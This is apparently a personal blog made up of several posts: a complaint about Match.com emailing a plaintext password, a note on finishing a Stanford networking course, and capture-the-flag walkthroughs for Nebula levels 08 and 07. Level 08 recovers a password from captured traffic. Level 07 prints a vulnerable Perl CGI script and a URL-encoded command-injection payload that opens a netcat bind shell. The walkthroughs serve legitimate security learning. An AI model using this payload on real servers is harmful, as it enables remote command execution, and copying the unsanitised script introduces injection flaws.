Match.com just sent me an email containing my password in plain text!

A few weeks ago, when I was going through all my online accounts and making the passwords more secure and unique I logged in to Match.com and deactivated my account. I didn’t delete it, just made it dormant. I did this because I found my Fiancée over 3 years ago (via Match.com) so there was no reason to still have an active account. I didn’t want to delete the account because it had some of our earliest messages to each other saved.

Anyway, I checked my emails today and noticed that I had one from them encouraging me to re-activate my account. What was more concerning was that the email contained my password in plain text! Here is a screenshot of the email:

Screen Shot 2012-12-31 at 10.13.27

I was about to submit them to plaintextoffenders.com but I did a search before and found that they were already added to the list 15 months ago, so I left a comment on the plaintextoffenders listing and decided to send a message to Match.com. The message was:

On the 20th of December 2012 I received an email encouraging me to reactivate my account. What concerns me is that in the body of the email was my password, in plain text! Firstly you should not be storing my password in plain text, and secondly (if you insist on storing passwords as plain text) you should not be sending it to me over something as insecure as email, especially if I didn’t request it!

I was about to submit match.com to http://plaintextoffenders.com, but when I searched, I saw that it was already submitted some 15 months ago. See http://plaintextoffenders.com/post/9744438766/match-com-dating-site-very-soon-after-i-got-this.

For a brief overview of why storing passwords in plain text is bad, you can start reading here: http://plaintextoffenders.com/about/

Please bear in mind that while you are now being shamed by plaintextoffenders.com, if you decide to fix the security flaw, your site would be moved to a different section of the site where you would be praised for admitting the fault and fixing it. See http://plaintextoffenders.com/reformed

I am in no way affiliated with plaintextoffenders.com, but I do support what they are trying to do and I would like to know if you are in the process of fixing, or plan to fix this security flaw in the near future?

Please reply to <email address removed>

I will update this post if/when I get a reply, but in the meantime I would recommend against joining Match.com and deleting any accounts you might have with them until they act a bit more responsibly.

Update: I got this email back from Match.com:

Thank you for contacting us at match.com.

We understand that you received an email from us on the 20th December 2012 with your password in plain text which you feel is a serious compromise of security.

We are really sorry about this error and I have forwarded your issue to our site developers to look into.

We hope you have found this information useful and please feel free to get in touch if there is anything further we can help you with. For answers to the most common questions click ‘Help’, available from the foot of any page.

At least they are not dismissing it. I wonder if anything will actually change?

I passed my course :-)

I was doing a free online networking course from Stanford University called “An Introduction to Computer Networks” recently, and they just told me that I passed.

Apparently I needed 50%, and I got 84%. I needn’t have tried so hard!

I think the course title was misleading; I was expecting to learn a bit more detail about stuff that I had already taught myself about simple LANs; network masks, routing, etc. but it was much more than just this this. It was actually more to do with how the internet works and included some quite complicated concepts and mathematical/statistical theories. I found it pretty hard work, to the point that I considered jacking it in a couple of times, because it was taking a lot of my evening and weekend time, but I’m glad I made it through. I’m just thankful that it was quite short (about 6 weeks) because now the pressure is off and I have some free time again.

The free course is by Stanford University professors Nick McKeown and Philip Levis and many subjects in detail including:

  • Protocols:
    • IP
    • TCP
    • UDP
    • ICMP
    • ARP
    • DHCP
    • DNS
    • NAT
    • BGP
    • Ethernet
  • Other Theory:
    • Encapsulation
    • Packet Switching
    • Delays (End to End & Queueing)
    • Broadcasting
    • Routing
    • Wireless

The course goes into so much detail in these subjects, and in many more. They are planning on re-running the course in Autumn 2013, so if any of this sounds interesting to you, then you should definitely consider enrolling nearer the time.

So now I’m just waiting to receive my statement on completion… I think it’s due in the new year.

Lastly I should say thanks to Nick and Philip for putting the course together and for offering it for free – Cheers guys

Exploit Exercises – Nebula – Level 08

I must admit I needed a bit of help with his one, I had most of it but not quite all. It started with the following information:

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08 . Files for this level can be found in /home/flag08.

So in ~flag08 there is one file of interest; capture.pcap. This is some captured network traffic. I copied this file onto my Macbook and opened it up in wireshark and spent some time looking through it. I found some interesting information like frame 43 contained a password prompt (the text “Password:”) from the server, followed by an ack from the client, then all subsequent packet exchanges contained 1 byte of TCP payload data from the client followed by an empty TCP ack packet from the server. Going through the packets, I could see that the user had sent: “backdoor…00Rm8.ate.” and then the server had replied “Login incorrect”. If we right click on a packet in the stream and select Follow TCP stream, we can see this a bit clearer.

But “backdoor…00Rm8.ate.” is not the password for flag08’s account, we need more investigation. While in the Follow TCP stream view, I selected hex dump view, and I can see that all the dots are not the same byte. Presumably they are all ascii, so I checked the ascii codes; 7f=backspace, 0d=Carriage-return.

So the password was “backd00Rmate”, this just so happens to be the password for flag08’s account.

Exploit Exercises – Nebula – Level 07

This one starts with the following information:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

and Source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/perl
 
use CGI qw{param};
 
print "Content-type: text/html\n\n";
 
sub ping {
    $host = $_[0];
 
    print("<html><head><title>Ping results</title></head><body><pre>");
 
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; } 
 
    print("</pre></body></html>");
 
}
 
# check if Host set. if not, display normal page, etc
 
ping(param("Host"));

We can see that the flag07 user has an thttpd.conf file in his directory, indicating that he has a http daemon or (web server) running. This is further compounded by the fact that he has a perl script (index.cgi) in his home directory.

In the thttpd.conf file it tells us that the web server is running on port 7007. I didn’t want to exit the VM, which meant that I didn’t have a web browser, but I do have wget which allows me to make http requests from the command line so I ran:

wget -O- http://localhost:7007/index.cgi

and got some output telling me how to use ping (because it hadn’t been given sufficient arguments. From the perl code, I could see that it wants a variable submitted as “Host”. It looks like it will use this as the machine name to ping. This time I tried:

wget -O- http://localhost:7007/index.cgi?Host=localhost

and got back ping results, but I need to get this script to do something other than ping… I can see that the ping command is just a string with the submitted host name “injected” into it. There is no input sanitisation going on, so it is ripe for some code injection.

I could get the script to copy my elevated-shell-launcher program and thenset the setuid bit like I did in level 03, but this challenge reminded me of something I learned while playing with DVWA (using netcat to send shell over the network) so I tried that method instead. The url I need to load would submit the following as the Host variable:

;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo;

When injected to the command that is run in the perl script, to actual command that is executed will be:

ping -c 3 ;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo; 2&gt;&amp;1

This is quite a command, so I’ll break it down:

  • ping -c 3 ; – This command will fail because there is no host given, but we don’t care about that
  • mkfifo /tmp/pipe; – Make a special “pipe” file in /tmp/pipe, I’ll explain why later…
  • cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe; – this reads data from the /tmp/pipe and sends it to /bin/bash, which sends it’s output to nc, which is listening on port 4444, which then sends it’s output (stdout and stderr) back to /tmp/pipe.
  • rm /tmp/fifo; – clear up the pipe file after nc has closed.
  • 2>&1 – Redirects stderr to stdout. This is just left over from the perl script’s command, we don’t care about it really.

This should set up a netcat process listening on TCP port 4444 that will accept data (in our case this will be bash commands) from the network and send it to /tmp/pipe. cat will read data from /tmp/pipe and send it to bash, which will send it’s output to netcat, which will in turn send that back over the network. A kind of remote shell. Passing input/output of netcat and bash in this circular fashion is only possible by way of a fifo pipe and the cat command.

Obviously I’ll have to URL encode my host variable, so my whole command becomes:

wget -O- http://localhost:7007/index.cgi?Host=%3Bmkfifo%20%2Ftmp%2Fpipe%3Bcat%20%2Ftmp%2Fpipe%7Cbash%7Cnc%20-l%204444%202%3E%261%3E%2Ftmp%2Fpipe%3Brm%20%2Ftmp%2Ffifo%3B

Now I just connect from another tty session or another machine on the network (though you’ll have to edit the command if you do that) using:

nc localhost 4444

Now I can run any command including whoami and getflag